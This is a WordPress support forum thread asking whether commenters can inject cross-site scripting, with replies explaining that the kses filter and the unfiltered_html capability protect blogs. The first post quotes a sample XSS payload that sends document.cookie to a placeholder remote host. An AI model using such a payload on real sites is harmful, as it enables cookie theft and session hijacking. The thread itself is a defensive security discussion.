Out of curiosity, what happened when you tried that? What was your test?
Thread Starter
deko
(@deko)
<script>
var url = 'http://www.mysite.com/send_me_passwords.cgi';
url = url + '?cookie=' + escape(document.cookie)
document.write('<script src="'+url+'">');
</script>
from: http://iamcal.com/publish/articles/php/processing_html/
I think it would be best to disallow all markup in comments to avoid any risk.
This plugin:
http://www.chweng.idv.tw/blog/wordpress/comment-without-tags/
Is supposed to:
“Strip all HTML tags in comments to prevent malicious or malformed tags from destroying your pages”
I have not tested it. I downloaded it and it’s only one script that appears to reference a non-existant function.
What we need is built-in comment scrubbing.
Thread Starter
deko
(@deko)
This looks promising:
http://pear.php.net/package/HTML_Safe
But the first line of the script is this:
// requires HTMLSax3 package
require_once 'XML/HTMLSax3.php';
Does anyone know how to verify if my host’s server has the HTMLSax3 package installed?
Can this be verified using phpinfo.php?
Thread Starter
deko
(@deko)
This is a better site to download HTML_Safe:
http://pixel-apes.com/safehtml
I’ve tested and verified that a bug exists in 2.0.2, namely, that an unclosed markup tag, submitted in a comment, will affect the appearance of text outside of that comment, thus altering the display of your blog.
But the more important question remains:
Are WP blogs at risk of cross-site scripting (XSS) when users submit malicious code in the Comments form?
I was pretty sure WP >did< some level of scrubbing. What have you tried that’s worked?
Thread Starter
deko
(@deko)
I don’t know enough about XSS to test for a vulnerability, but I’m going to use HTML_Safe anyway, if only to squash the ‘unclosed tag in comments’ bug.
I looked for codex documentation explaining why WP blogs are safe from XSS and other malicious code submitted in comments. I found this:
unfiltered_html
Allows – if enabled – the user to post HTML markup or even Javascript code in posts, pages or comments.
Note: Enabling this option for non-privileged users may result in their posting malicious code to your blog.
http://codex.wordpress.org/Roles_and_Capabilities#Editor
I don’t know if unfiltered_html is disabled by default, but unless there’s some documentation assuring us that we’re safe, it’s best to assume we’re not.
Definitely definitely safe. The unfiltered_html cap is only given to admins and certainly not to anonymous users or even registered ones.
This is something that has been safe in the WP core for literally years.
unfiltered_html is granted initially only to users having the Administrator or Editor roles. Casual users visiting your site will have their comments stripped of tags that are not allowed, including script tags.
When you are logged in as a user with the unfiltered_html capability, you are allowed to post script into comments. This is why you would be able to do this on your own blog.
IIRC, kses is used to prevent unwanted markup from users without this capability.
WP uses kses to filter comments. Users that have the unfiltered_html capability (Editors and Administrators) are not filtered. They are considered trusted.
Thread Starter
deko
(@deko)
I did some testing with the kses file, and yes, it appears that unfiltered_html is allowed only for Admins and Editors.
I commented the <em> tag (from @allowedtags) and then tried makring up a comment with it to see if had any effect – it didn’t, unless I was logged in as Admin (indicating that html was filtered by kses otherwise).
So kses is protecting us.
kses doesn’t catch unclosed tags in comments, but this is not a security problem.
